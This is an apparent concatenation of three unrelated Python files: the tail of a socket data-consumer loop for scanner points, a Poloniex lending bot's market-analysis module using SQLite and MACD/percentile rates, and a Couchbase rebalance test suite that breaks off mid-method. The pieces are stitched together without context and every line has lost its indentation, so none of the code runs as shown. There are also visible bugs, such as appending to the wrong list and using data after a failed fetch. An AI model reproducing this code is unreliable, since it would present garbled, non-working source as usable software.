counter = 0
xLines = []
yLines = []
zLines = []
phiLines = []
thetaLines = []
distLines = []
timeLines = []
xLines.append([])
yLines.append([])
zLines.append([])
phiLines.append([])
thetaLines.append([])
distLines.append([])
dataSet = ""
currTime = None
emptied = False
i = 0
index = 0
start = time.time()
while not stop_event.is_set():
try:
# get some data from the queue, process it to cartesian
dataline, anglePhi = dataQueue.get(timeout=0.25)
emptied = False
if dataline == 'end':
xLines.append([])
yLines.append([])
zLines.append([])
phiLines.append([])
thetaLines.append([])
distLines.append([])
i += 1
continue
elif dataline == "":
if not dataSet == "":
for string in splitNparts(dataSet,64):
X, Y, Z, dist, phi, th = decode_new(string, anglePhi)
#self.slitAngle = lastAngle
xLines[i].append(X)
yLines[i].append(Y)
zLines[i].append(Z)
phiLines[i].append(phi)
thetaLines.append(th)
distLines.append(dist)
# timeLines = timeLines + currTime
#debugPrint(str(distLines), SOCKET_DATA)
dataSet = ""
continue
elif dataline == self.StartCommand:
counter = 0
else:
counter += 1
#debugPrint("Consumer: data= {}".format(dataline), SOCKET_DATA)
self.commandOutput += dataline + '\n'
# if counter == 4:
# currTime = [decodeShort(dataline[:-1])]
if counter >= 5:
dataSet = dataSet + dataline
except queue.Empty as e:
if not emptied:
debugPrint( "Data Queue is empty", SOCKET_MSG)
emptied = True
continue
self.processedDataArrays = (xLines, yLines, zLines, phiLines, thetaLines, distLines)
end = time.time()
debugPrint("Time difference: {}".format(end-start), ROSTA)
##
# exit
#
# Description: closes out the socket
# returns: 0 on success, -1 on failure
##
def exit(self):
if not self.socket is None:
self.socket.close()
return 0
else:
return -1
|
MarketAnalysis.py
|
import os
import sys
import threading
import time
import traceback
import datetime
import pandas as pd
import sqlite3 as sqlite
from sqlite3 import Error
from poloniexlendingbot.ExchangeApi import ApiError
# Bot libs
import poloniexlendingbot.Configuration as Config
from poloniexlendingbot.Data import truncate
try:
import numpy
use_numpy = True
except ImportError as ex:
print("WARN: Module Numpy not found, using manual percentile method instead. "
"It is recommended to install Numpy. Error: {0}".format(ex))
use_numpy = False
# Improvements
# [ ] Provide something that takes into account dust offers. (The golden cross works well on BTC, not slower markets)
# [ ] RE: above. Weighted rate.
# [ ] Add docstring to everything
# [ ] Unit tests
# NOTES
# * A possible solution for the dust problem is take the top 10 offers and if the offer amount is less than X% of the
# total available, ignore it as dust.
class MarketDataException(Exception):
pass
class MarketAnalysis(object):
def __init__(self, config, api):
self.currencies_to_analyse = config.get_currencies_list('analyseCurrencies', 'MarketAnalysis')
self.update_interval = int(config.get('MarketAnalysis', 'analyseUpdateInterval', 10, 1, 3600))
self.api = api
self.lending_style = int(config.get('MarketAnalysis', 'lendingStyle', 75, 1, 99))
self.recorded_levels = 10
self.poloniexlendingbot_dir = os.path.dirname(os.path.realpath(__file__))
self.top_dir = os.path.dirname(self.poloniexlendingbot_dir)
self.db_dir = os.path.join(self.top_dir, 'market_data')
self.recorded_levels = int(config.get('MarketAnalysis', 'recorded_levels', 3, 1, 100))
self.data_tolerance = float(config.get('MarketAnalysis', 'data_tolerance', 15, 10, 90))
self.ma_debug_log = config.getboolean('MarketAnalysis', 'ma_debug_log')
self.MACD_long_win_seconds = int(config.get('MarketAnalysis', 'MACD_long_win_seconds',
60 * 30 * 1 * 1,
60 * 1 * 1 * 1,
60 * 60 * 24 * 7))
self.percentile_seconds = int(config.get('MarketAnalysis', 'percentile_seconds',
60 * 60 * 24 * 1,
60 * 60 * 1 * 1,
60 * 60 * 24 * 14))
if self.MACD_long_win_seconds > self.percentile_seconds:
keep_sec = self.MACD_long_win_seconds
else:
keep_sec = self.percentile_seconds
self.keep_history_seconds = int(config.get('MarketAnalysis', 'keep_history_seconds',
int(keep_sec * 1.1),
int(keep_sec * 1.1),
60 * 60 * 24 * 14))
self.MACD_short_win_seconds = int(config.get('MarketAnalysis', 'MACD_short_win_seconds',
int(self.MACD_long_win_seconds / 12),
1,
self.MACD_long_win_seconds / 2))
self.daily_min_multiplier = float(config.get('Daily_min', 'multiplier', 1.05, 1))
self.delete_thread_sleep = float(config.get('MarketAnalysis', 'delete_thread_sleep',
self.keep_history_seconds / 2,
60,
60 * 60 * 2))
self.exchange = config.get_exchange()
if len(self.currencies_to_analyse) != 0:
for currency in self.currencies_to_analyse:
try:
self.api.return_loan_orders(currency, 5)
except Exception as cur_ex:
raise Exception("ERROR: You entered an incorrect currency: '{0}' to analyse the market of, please "
"check your settings. Error message: {1}".format(currency, cur_ex))
def run(self):
"""
Main entry point to start recording data. This starts all the other threads.
"""
for cur in self.currencies_to_analyse:
db_con = self.create_connection(cur)
self.create_rate_table(db_con, self.recorded_levels)
db_con.close()
self.run_threads()
self.run_del_threads()
def run_threads(self):
"""
Start threads for each currency we want to record. (should be configurable later)
"""
for _ in ['thread1']:
for cur in self.currencies_to_analyse:
thread = threading.Thread(target=self.update_market_thread, args=(cur,))
thread.deamon = True
thread.start()
def run_del_threads(self):
"""
Start thread to start the DB cleaning threads.
"""
for _ in ['thread1']:
for cur in self.currencies_to_analyse:
del_thread = threading.Thread(target=self.delete_old_data_thread, args=(cur, self.keep_history_seconds))
del_thread.daemon = False
del_thread.start()
def delete_old_data_thread(self, cur, seconds):
"""
Thread to clean the DB.
"""
while True:
try:
db_con = self.create_connection(cur)
self.delete_old_data(db_con, seconds)
except Exception as ex:
print("Error in MarketAnalysis: {0}".format(ex))
traceback.print_exc()
time.sleep(self.delete_thread_sleep)
@staticmethod
def print_traceback(ex, log_message):
print("{0}: {1}".format(log_message, ex))
traceback.print_exc()
@staticmethod
def print_exception_error(ex, log_message, debug=False):
print("{0}: {1}".format(log_message, ex))
if debug:
import traceback
ex_type, value, tb = sys.exc_info()
print("DEBUG: Class:{0} Args:{1}".format(ex.__class__, ex.args))
print("DEBUG: Type:{0} Value:{1} LineNo:{2}".format(ex_type, value, tb.tb_lineno))
traceback.print_exc()
def update_market_thread(self, cur, levels=None):
"""
This is where the main work is done for recording the market data. The loop will not exit and continuously
polls exchange for the current loans in the book.
:param cur: The currency (database) to remove data from
:param levels: The depth of offered rates to store
"""
if levels is None:
levels = self.recorded_levels
db_con = self.create_connection(cur)
while True:
try:
raw_data = self.api.return_loan_orders(cur, levels)['offers']
except ApiError as ex:
if '429' in str(ex):
if self.ma_debug_log:
print("Caught ERR_RATE_LIMIT, sleeping capture and increasing request delay. Current"
" {0}ms".format(self.api.req_period))
time.sleep(130)
except Exception as ex:
if self.ma_debug_log:
self.print_traceback(ex, "Error in returning data from exchange")
else:
print("Error in returning data from exchange, ignoring")
market_data = []
for i in xrange(levels):
try:
market_data.append(str(raw_data[i]['rate']))
market_data.append(str(raw_data[i]['amount']))
except IndexError:
market_data.append("5")
market_data.append("0.1")
market_data.append('0') # Percentile field not being filled yet.
self.insert_into_db(db_con, market_data)
def insert_into_db(self, db_con, market_data, levels=None):
if levels is None:
levels = self.recorded_levels
insert_sql = "INSERT INTO loans ("
for level in xrange(levels):
insert_sql += "rate{0}, amnt{0}, ".format(level)
insert_sql += "percentile) VALUES ({0});".format(','.join(market_data)) # percentile = 0
with db_con:
try:
db_con.execute(insert_sql)
except Exception as ex:
self.print_traceback(ex, "Error inserting market data into DB")
def delete_old_data(self, db_con, seconds):
"""
Delete old data from the database
:param db_con: Connection to the database
:param cur: The currency (database) to remove data from
:param seconds: The time in seconds of the oldest data to be kept
"""
del_time = int(time.time()) - seconds
with db_con:
query = "DELETE FROM loans WHERE unixtime < {0};".format(del_time)
cursor = db_con.cursor()
cursor.execute(query)
@staticmethod
def get_day_difference(date_time): # Will be a number of seconds since epoch
"""
Get the difference in days between the supplied date_time and now.
:param date_time: A python date time object
:return: The number of days that have elapsed since date_time
"""
date1 = datetime.datetime.fromtimestamp(float(date_time))
now = datetime.datetime.now()
diff_days = (now - date1).days
return diff_days
def get_rate_list(self, cur, seconds):
"""
Query the database (cur) for rates that are within the supplied number of seconds and now.
:param cur: The currency (database) to remove data from
:param seconds: The number of seconds between the oldest order returned and now.
:return: A pandas DataFrame object with named columns ('time', 'rate0', 'rate1',...)
"""
# Request more data from the DB than we need to allow for skipped seconds
request_seconds = int(seconds * 1.1)
full_list = Config.get_all_currencies()
if isinstance(cur, sqlite.Connection):
db_con = cur
else:
if cur not in full_list:
raise ValueError("{0} is not a valid currency, must be one of {1}".format(cur, full_list))
if cur not in self.currencies_to_analyse:
return []
db_con = self.create_connection(cur)
price_levels = ['rate0']
rates = self.get_rates_from_db(db_con, from_date=time.time() - request_seconds, price_levels=price_levels)
if len(rates) == 0:
return []
df = pd.DataFrame(rates)
columns = ['time']
columns.extend(price_levels)
try:
df.columns = columns
except:
if self.ma_debug_log:
print("DEBUG:get_rate_list: cols: {0} rates:{1} db:{2}".format(columns, rates, db_con))
raise
# convert unixtimes to datetimes so we can resample
df.time = pd.to_datetime(df.time, unit='s')
# If we don't have enough data return df, otherwise the resample will fill out all values with the same data.
# Missing data tolerance allows for a percentage to be ignored and filled in by resampling.
if len(df) < seconds * (self.data_tolerance / 100):
return df
# Resample into 1 second intervals, average if we get two in the same second and fill any empty spaces with the
# previous value
df = df.resample('1s', on='time').mean().ffill()
return df
def get_analysis_seconds(self, method):
"""
Gets the correct number of seconds to use for anylsing data depeding on the method being used.
"""
if method == 'percentile':
return self.percentile_seconds
elif method == 'MACD':
return self.MACD_long_win_seconds
def get_rate_suggestion(self, cur, rates=None, method='percentile'):
"""
Return the suggested rate from analysed data. This is the main method for retrieving data from this module.
Currently this only supports returning of a single value, the suggested rate. However this will be expanded to
suggest a lower and higher rate for spreads.
:param cur: The currency (database) to remove data from
:param rates: This is used for unit testing only. It allows you to populate the data used for the suggestion.
:param method: The method by which you want to calculate the suggestion.
:return: A float with the suggested rate for the currency.
"""
error_msg = "WARN: Exception found when analysing markets, if this happens for more than a couple minutes " +\
"please create a Github issue so we can fix it. Otherwise, you can ignore it. Error"
try:
rates = self.get_rate_list(cur, self.get_analysis_seconds(method)) if rates is None else rates
if not isinstance(rates, pd.DataFrame):
raise ValueError("Rates must be a Pandas DataFrame")
if len(rates) == 0:
print("Rate list not populated")
if self.ma_debug_log:
print("DEBUG:get_analysis_seconds: cur: {0} method:{1} rates:{2}".format(cur, method, rates))
return 0
if method == 'percentile':
return self.get_percentile(rates.rate0.values.tolist(), self.lending_style)
if method == 'MACD':
macd_rate = truncate(self.get_MACD_rate(cur, rates), 6)
if self.ma_debug_log:
print("Cur:{0}, MACD:{1:.6f}, Perc:{2:.6f}, Best:{3:.6f}"
.format(cur, macd_rate, self.get_percentile(rates.rate0.values.tolist(), self.lending_style),
rates.rate0.iloc[-1]))
return macd_rate
except MarketDataException:
if method != 'percentile':
print("Caught exception during {0} analysis, using percentile for now".format(method))
return self.get_percentile(rates.rate0.values.tolist(), self.lending_style)
else:
raise
except Exception as ex:
self.print_exception_error(ex, error_msg, debug=self.ma_debug_log)
return 0
@staticmethod
def percentile(N, percent, key=lambda x: x):
"""
http://stackoverflow.com/questions/2374640/how-do-i-calculate-percentiles-with-python-numpy/2753343#2753343
Find the percentile of a list of values.
:parameter N: A list of values. Note N MUST BE already sorted.
:parameter percent: A float value from 0.0 to 1.0.
:parameter key: Optional key function to compute value from each element of N.
:return: Percentile of the values
"""
import math
if not N:
return None
k = (len(N) - 1) * percent
f = math.floor(k)
c = math.ceil(k)
if f == c:
return key(N[int(k)])
d0 = key(N[int(f)]) * (c - k)
d1 = key(N[int(c)]) * (k - f)
return d0 + d1
def get_percentile(self, rates, lending_style, use_numpy=use_numpy):
"""
Take a list of rates no matter what method is being used, simple list, no pandas / numpy array
"""
if use_numpy:
result = numpy.percentile(rates, int(lending_style))
else:
result = self.percentile(sorted(rates), lending_style / 100.0)
result = truncate(result, 6)
return result
def get_MACD_rate(self, cur, rates_df):
"""
Golden cross is a bit of a misnomer. But we're trying to look at the short term moving average and the long
term moving average. If the short term is above the long term then the market is moving in a bullish manner and
it's a good time to lend. So return the short term moving average (scaled with the multiplier).
:param cur: The currency (database) to remove data from
:param rates_df: A pandas DataFrame with times and rates
:param short_period: Length in seconds of the short window for MACD calculations
:param long_period: Length in seconds of the long window for MACD calculations
:param multiplier: The multiplier to apply to the rate before returning.
:retrun: A float of the suggested, calculated rate
"""
if len(rates_df) < self.get_analysis_seconds('MACD') * (self.data_tolerance / 100):
print("{0} : Need more data for analysis, still collecting. I have {1}/{2} records"
.format(cur, len(rates_df), int(self.get_analysis_seconds('MACD') * (self.data_tolerance / 100))))
raise MarketDataException
short_rate = rates_df.rate0.tail(self.MACD_short_win_seconds).mean()
long_rate = rates_df.rate0.tail(self.MACD_long_win_seconds).mean()
if self.ma_debug_log:
sys.stdout.write("Short higher: ") if short_rate > long_rate else sys.stdout.write("Long higher: ")
if short_rate > long_rate:
if rates_df.rate0.iloc[-1] < short_rate:
return short_rate * self.daily_min_multiplier
else:
return rates_df.rate0.iloc[-1] * self.daily_min_multiplier
else:
return long_rate * self.daily_min_multiplier
def create_connection(self, cur, db_path=None, db_type='sqlite3'):
"""
Create a connection to the sqlite DB. This will create a new file if one doesn't exist. We can use :memory:
here for db_path if we don't want to store the data on disk
:param cur: The currency (database) in the DB
:param db_path: DB directory
:return: Connection object or None
"""
if db_path is None:
prefix = Config.get_exchange()
db_path = os.path.join(self.db_dir, '{0}-{1}.db'.format(prefix, cur))
try:
con = sqlite.connect(db_path)
return con
except Error as ex:
print(ex)
def create_rate_table(self, db_con, levels):
"""
Create a new table to hold rate data.
:param db_con: Connection to the database
:param cur: The currency being stored in the DB. There's a table for each currency.
:param levels: The depth of offered rates to store
"""
with db_con:
cursor = db_con.cursor()
create_table_sql = "CREATE TABLE IF NOT EXISTS loans (id INTEGER PRIMARY KEY AUTOINCREMENT," + \
"unixtime integer(4) not null default (strftime('%s','now')),"
for level in xrange(levels):
create_table_sql += "rate{0} FLOAT, ".format(level)
create_table_sql += "amnt{0} FLOAT, ".format(level)
create_table_sql += "percentile FLOAT);"
cursor.execute("PRAGMA journal_mode=wal")
cursor.execute(create_table_sql)
def get_rates_from_db(self, db_con, from_date=None, price_levels=['rate0']):
"""
Query the DB for all rates for a particular currency
:param db_con: Connection to the database
:param cur: The currency you want to get the rates for
:param from_date: The earliest data you want, specified in unix time (seconds since epoch)
:price_level: We record multiple price levels in the DB, the best offer being rate0
"""
with db_con:
cursor = db_con.cursor()
query = "SELECT unixtime, {0} FROM loans ".format(",".join(price_levels))
if from_date is not None:
query += "WHERE unixtime > {0}".format(from_date)
query += ";"
cursor.execute(query)
return cursor.fetchall()
|
rebalancetests.py
|
import time
import unittest
from TestInput import TestInputSingleton
import logger
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached, LoadWithMcsoda
from threading import Thread
from old_tasks import task, taskmanager
from memcached.helper.data_helper import DocumentGenerator
from memcached.helper.old_kvstore import ClientKeyValueStore
class RebalanceBaseTest(unittest.TestCase):
@staticmethod
def common_setup(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.servers = self.input.servers
master = self.servers[0]
rest = RestConnection(master)
# Cleanup previous state
self.task_manager = None
rest.stop_rebalance()
RebalanceBaseTest.reset(self)
# Initialize test params
self.replica = self.input.param("replica", 1)
# By default we use keys-count for LoadTask
# Use keys-count=-1 to use load-ratio
self.keys_count = self.input.param("keys-count", 30000)
self.load_ratio = self.input.param("load-ratio", 6)
self.expiry_ratio = self.input.param("expiry-ratio", 0.1)
self.delete_ratio = self.input.param("delete-ratio", 0.1)
self.access_ratio = self.input.param("access-ratio", 1 - self.expiry_ratio - self.delete_ratio)
self.num_buckets = self.input.param("num-buckets", 1)
self.num_rebalance = self.input.param("num-rebalance", 1)
self.do_ascii = self.input.param("ascii", False)
self.do_verify = self.input.param("do-verify", True)
self.repeat = self.input.param("repeat", 1)
self.max_ops_per_second = self.input.param("max_ops_per_second", 500)
self.min_item_size = self.input.param("min_item_size", 128)
self.do_stop = self.input.param("do-stop", False)
self.skip_cleanup = self.input.param("skip-cleanup", False)
self.checkResidentRatio = self.input.param("checkResidentRatio", False)
self.activeRatio = self.input.param("activeRatio", 50)
self.replicaRatio = self.input.param("replicaRatio", 50)
self.case_number = self.input.param("case_number", 0)
self.log.info('picking server : {0} as the master'.format(master))
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.servers)
info = rest.get_nodes_self()
rest.init_cluster(username=master.rest_username,
password=master.rest_password)
rest.init_cluster_memoryQuota(memoryQuota=int(info.mcdMemoryReserved * node_ram_ratio))
BucketOperationHelper.create_multiple_buckets(master, self.replica, node_ram_ratio * (2.0 / 3.0),
howmany=self.num_buckets, sasl=not self.do_ascii)
buckets = rest.get_buckets()
for bucket in buckets:
ready = BucketOperationHelper.wait_for_memcached(master, bucket.name)
self.assertTrue(ready, "wait_for_memcached failed")
# Initialize and start the taskManager
self.task_manager = taskmanager.TaskManager()
self.task_manager.start()
@staticmethod
def common_tearDown(self):
self.log.info("============== basetestcase cleanup was started for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
if self.task_manager is not None:
self.task_manager.cancel()
self.task_manager.join()
if not self.skip_cleanup:
RebalanceBaseTest.reset(self)
self.log.info("============== basetestcase cleanup was finished for test #{0} {1} =============="\
.format(self.case_number, self._testMethodName))
@staticmethod
def reset(self):
rest = RestConnection(self.servers[0])
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
for server in self.servers:
ClusterOperationHelper.cleanup_cluster([server])
self.log.info("Stopping load in Teardown")
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
@staticmethod
def replication_verification(master, bucket_data, replica, test, failed_over=False):
asserts = []
rest = RestConnection(master)
buckets = rest.get_buckets()
nodes = rest.node_statuses()
test.log.info("expect {0} / {1} replication ? {2}".format(len(nodes),
(1.0 + replica), len(nodes) / (1.0 + replica)))
for bucket in buckets:
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
if len(nodes) / (1.0 + replica) >= 1:
test.assertTrue(RebalanceHelper.wait_for_replication(rest.get_nodes(), timeout=300),
msg="replication did not complete after 5 minutes")
#run expiry_pager on all nodes before doing the replication verification
for bucket in buckets:
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
test.log.info("wait for expiry pager to run on all these nodes")
time.sleep(30)
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 3600, bucket.name)
ClusterOperationHelper.flushctl_set(master, "exp_pager_stime", 30, bucket.name)
# windows need more than 15 minutes to get number matched
replica_match = RebalanceHelper.wait_till_total_numbers_match(bucket=bucket.name,
master=master,
timeout_in_seconds=600)
if not replica_match:
asserts.append("replication was completed but sum(curr_items) don't match the curr_items_total %s" %
bucket.name)
if not failed_over:
stats = rest.get_bucket_stats(bucket=bucket.name)
# RebalanceHelper.print_taps_from_all_nodes(rest, bucket.name)
msg = "curr_items : {0} is not equal to actual # of keys inserted : {1} : bucket: {2}"
if bucket_data[bucket.name]['kv_store'] is None:
items_inserted = bucket_data[bucket.name]["items_inserted_count"]
else:
items_inserted = len(bucket_data[bucket.name]['kv_store'].valid_items())
active_items_match = stats["curr_items"] == items_inserted
if not active_items_match:
asserts.append(msg.format(stats["curr_items"], items_inserted, bucket.name))
if len(asserts) > 0:
for msg in asserts:
test.log.error(msg)
test.assertTrue(len(asserts) == 0, msg=asserts)
@staticmethod
def get_distribution(load_ratio):
distribution = {10: 0.2, 20: 0.5, 30: 0.25, 40: 0.05}
if load_ratio == 10:
distribution = {1024: 0.4, 2 * 1024: 0.5, 10 * 1024: 0.1}
elif load_ratio > 10:
distribution = {5 * 1024: 0.4, 10 * 1024: 0.5, 20 * 1024: 0.1}
return distribution
@staticmethod
def rebalance_in(servers, how_many):
return RebalanceHelper.rebalance_in(servers, how_many)
@staticmethod
def load_data_for_buckets(rest, load_ratio, distribution, rebalanced_servers, bucket_data, test):
buckets = rest.get_buckets()
for bucket in buckets:
inserted_count, rejected_count = \
MemcachedClientHelper.load_bucket(name=bucket.name,
servers=rebalanced_servers,
ram_load_ratio=load_ratio,
value_size_distribution=distribution,
number_of_threads=1,
write_only=True,
moxi=True)
test.log.info('inserted {0} keys'.format(inserted_count))
bucket_data[bucket.name]["items_inserted_count"] += inserted_count
@staticmethod
def threads_for_buckets(rest, load_ratio, distribution, rebalanced_servers, bucket_data, delete_ratio=0,
expiry_ratio=0):
buckets = rest.get_buckets()
for bucket in buckets:
threads = MemcachedClientHelper.create_threads(servers=rebalanced_servers,
name=bucket.name,
ram_load_ratio=load_ratio,
value_size_distribution=distribution,
number_of_threads=4,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
[t.start() for t in threads]
bucket_data[bucket.name]["threads"] = threads
return bucket_data
@staticmethod
def bucket_data_init(rest):
bucket_data = {}
buckets = rest.get_buckets()
for bucket in buckets:
bucket_data[bucket.name] = {}
bucket_data[bucket.name]['items_inserted_count'] = 0
bucket_data[bucket.name]['inserted_keys'] = []
bucket_data[bucket.name]['kv_store'] = None
bucket_data[bucket.name]['tasks'] = {}
return bucket_data
@staticmethod
def load_data(master, bucket, keys_count=-1, load_ratio=-1, delete_ratio=0, expiry_ratio=0, test=None):
log = logger.Logger.get_logger()
inserted_keys, rejected_keys = \
MemcachedClientHelper.load_bucket_and_return_the_keys(servers=[master],
name=bucket,
ram_load_ratio=load_ratio,
number_of_items=keys_count,
number_of_threads=2,
write_only=True,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
moxi=True)
log.info("wait until data is completely persisted on the disk")
ready = RebalanceHelper.wait_for_stats_on_all(master, bucket, 'ep_queue_size', 0, timeout_in_seconds=120)
test.assertTrue(ready, "wait_for ep_queue_size == 0 failed")
ready = RebalanceHelper.wait_for_stats_on_all(master, bucket, 'ep_flusher_todo', 0, timeout_in_seconds=120)
test.assertTrue(ready, "wait_for ep_flusher_todo == 0 failed")
return inserted_keys
@staticmethod
def verify_data(master, inserted_keys, bucket, test):
log = logger.Logger.get_logger()
log.info("Verifying data")
ready = RebalanceHelper.wait_for_persistence(master, bucket)
BucketOperationHelper.keys_exist_or_assert_in_parallel(keys=inserted_keys, server=master, bucket_name=bucket,
test=test, concurrency=4)
@staticmethod
def tasks_for_buckets(rest, task_manager,
bucket_data,
new_doc_seed=None,
new_doc_count=-1,
DELETE_RATIO=0,
ACCESS_RATIO=0,
EXPIRY_RATIO=0,
ttl=5, data_perc=1):
# TODO: assert no value greater than 1
# TODO: assert sum of mutation ratios not greater than 1
for bucket in list(bucket_data.keys()):
get_task = None
del_task = None
exp_task = None
load_task = None
kv_store = bucket_data[bucket]['kv_store']
current_keys = kv_store.valid_items()
current_keys = current_keys[: int(len(current_keys) * data_perc)]
get_docs_count = int(len(current_keys) * ACCESS_RATIO)
del_docs_count = int(len(current_keys) * DELETE_RATIO)
exp_docs_count = int(len(current_keys) * EXPIRY_RATIO)
end_exp_index = del_docs_count + exp_docs_count
keys_to_get = current_keys[:get_docs_count]
keys_to_delete = current_keys[:del_docs_count]
keys_to_expire = current_keys[del_docs_count:end_exp_index]
# delete ratio of current keys
if len(keys_to_delete) > 0:
del_task = \
RebalanceTaskHelper.add_doc_del_task(task_manager, rest,
keys_to_delete,
bucket=bucket,
kv_store=kv_store)
# expire ratio of current keys
if len(keys_to_expire) > 0:
exp_task = \
RebalanceTaskHelper.add_doc_exp_task(task_manager, rest,
keys_to_expire,
bucket=bucket,
kv_store=kv_store)
# get ratio of current keys
if len(keys_to_get) > 0:
get_task = \
RebalanceTaskHelper.add_doc_get_task(task_manager, rest,
keys_to_get,
bucket=bucket)
# load more data
if new_doc_count == -1:
new_doc_count = len(current_keys)
load_task = \
RebalanceTaskHelper.add_doc_gen_task(task_manager, rest,
new_doc_count,
bucket=bucket,
seed=new_doc_seed,
kv_store=kv_store)
# update the users bucket_kv_info object
bucket_data[bucket]['tasks'] = {'get_task': get_task,
'del_task': del_task,
'exp_task': exp_task,
'load_task': load_task}
@staticmethod
def finish_all_bucket_tasks(rest, bucket_data):
buckets = rest.get_buckets()
[RebalanceBaseTest.finish_bucket_task(bucket_data[b.name]) for b in buckets]
@staticmethod
def finish_bucket_task(bucket_name_info):
log = logger.Logger().get_logger()
for k, _t in list(bucket_name_info['tasks'].items()):
if _t is not None:
log.info("Waiting for {0} task".format(k))
_t.result()
@staticmethod
def load_all_buckets_task(rest, task_manager, bucket_data, ram_load_ratio,
distribution=None, keys_count=-1, seed=None,
monitor=True):
buckets = rest.get_buckets()
tasks = None
for bucket in buckets:
kv_store = bucket_data[bucket.name].get('kv_store', None)
if kv_store is None:
kv_store = ClientKeyValueStore()
bucket_data[bucket.name]['kv_store'] = kv_store
tasks = RebalanceBaseTest.load_bucket_task_helper(rest, task_manager,
bucket.name, ram_load_ratio,
kv_store=kv_store,
keys_count=keys_count,
seed=seed,
monitor=monitor)
return tasks
@staticmethod
def load_bucket_task_helper(rest, task_manager, bucket, ram_load_ratio,
kv_store=None, distribution=None,
keys_count=-1, seed=None, monitor=True):
log = logger.Logger().get_logger()
tasks = []
if keys_count == -1:
# create document generators based on value_size_distrobution
doc_gen_configs = \
DocumentGenerator.get_doc_generators_by_load_ratio(rest,
bucket,
ram_load_ratio,
distribution)
for config in doc_gen_configs:
doc_gen = config['value']
how_many = config['how_many']
size = config['size']
seed = config['seed']
# start bucket loading task
msg = "start task to send {0} items with value of size : {1}"
log.info(msg.format(how_many, size))
doc_gen_task = RebalanceTaskHelper.add_doc_gen_task(task_manager, rest,
how_many, bucket,
kv_store=kv_store,
doc_generators=[doc_gen],
monitor=monitor)
tasks.append({'task': doc_gen_task, 'seed': seed})
else:
msg = "start task to send {0} items to bucket {1}"
log.info(msg.format(keys_count, bucket))
doc_gen_task = RebalanceTaskHelper.add_doc_gen_task(task_manager,
rest,
keys_count,
bucket,
kv_store,
seed=seed,
monitor=monitor)
tasks.append({'task': doc_gen_task, 'seed': seed})
return tasks
@staticmethod
def do_kv_verification(task_manager, rest, bucket_data):
log = logger.Logger().get_logger()
error_list = []
for bucket in bucket_data:
kv_store = bucket_data[bucket]['kv_store']
if kv_store is not None:
log.info("verifying kv store integrity")
errors = \
RebalanceTaskHelper.add_kv_integrity_helper(task_manager,
rest,
kv_store,
bucket)
error_list.append(errors)
log.info("verification errors: {0} ".format(error_list))
return error_list
@staticmethod
def do_kv_and_replica_verification(master, task_manager, bucket_data, replica, self, failed_over=False,):
rest = RestConnection(master)
RebalanceBaseTest.replication_verification(master, bucket_data, replica, self, failed_over=failed_over)
#verify only test without failed over cases
if not failed_over:
# run data integrity
error_list = RebalanceBaseTest.do_kv_verification(task_manager, rest, bucket_data)
[self.assertEqual(0, len(list(errors.items()))) for errors in error_list]
@staticmethod
def check_resident_ratio(self, master):
"""Check the memory stats- resident ratio from all the servers; expected range is either specified by the
user or default to 50% for both active and replica items.
Args:
self - self
master: master node.
Returns:
None.
Raises:
Error/Fail: If the resident ratio is below expected value ( default is 50)
"""
rest = RestConnection(master)
nodes = rest.node_statuses()
buckets = rest.get_buckets()
rebalance_stats = {}
for node in nodes:
for bucket in buckets:
_node = {"ip": node.ip, "port": node.port, "username": master.rest_username,
"password": master.rest_password}
mc_conn = MemcachedClientHelper.direct_client(_node, bucket.name)
stats = mc_conn.stats()
self.log.info(
"Bucket {0} node{1}:{2} \n high watermark : {0} , low watermark : {1}".format(bucket.name, node.ip,
node.port,
stats["ep_mem_high_wat"], stats["ep_mem_low_wat"]))
key = "{0}:{1}".format(node.ip, node.port)
rebalance_stats[key] = {}
rebalance_stats[key] = stats
active_items_ratio = int(rebalance_stats[key]["vb_active_perc_mem_resident"])
replica_items_ratio = int(rebalance_stats[key]["vb_replica_perc_mem_resident"])
self.log.info("active resident ratio is {0}".format(
active_items_ratio))
self.log.info("replica resident ratio is {0}".format(
replica_items_ratio))
if active_items_ratio < self.activeRatio:
self.fail(
"Very poor active resident ratio {0} for node {1}:{2} ".format(active_items_ratio, node.ip,
node.port))
if replica_items_ratio < self.replicaRatio:
self.fail(
"Very poor replica resident ratio {0}".format(replica_items_ratio, node.ip, node.port))
mc_conn.close()
class IncrementalRebalanceInTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, self.load_ratio,
keys_count=self.keys_count)
#if data are too big we will operate only with 10% of data
#because parallel ops is too slow due to num_locks=1 is used in old kvs store
data_perc = 1
#self.keys_count = self.keys_count // 10
for server in self.servers[1:]:
if self.keys_count >= 100000:
data_perc *= 0.1
self.log.info("we will operate only with 10% of data size {0} items".format(self.keys_count))
self.log.info("PARALLEL LOAD")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio, data_perc=data_perc)
self.log.info("INCREMENTAL REBALANCE IN")
# rebalance in a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[server],
[], do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("DONE LOAD AND REBALANCE")
# verification step
if self.do_verify:
self.log.info("VERIFICATION")
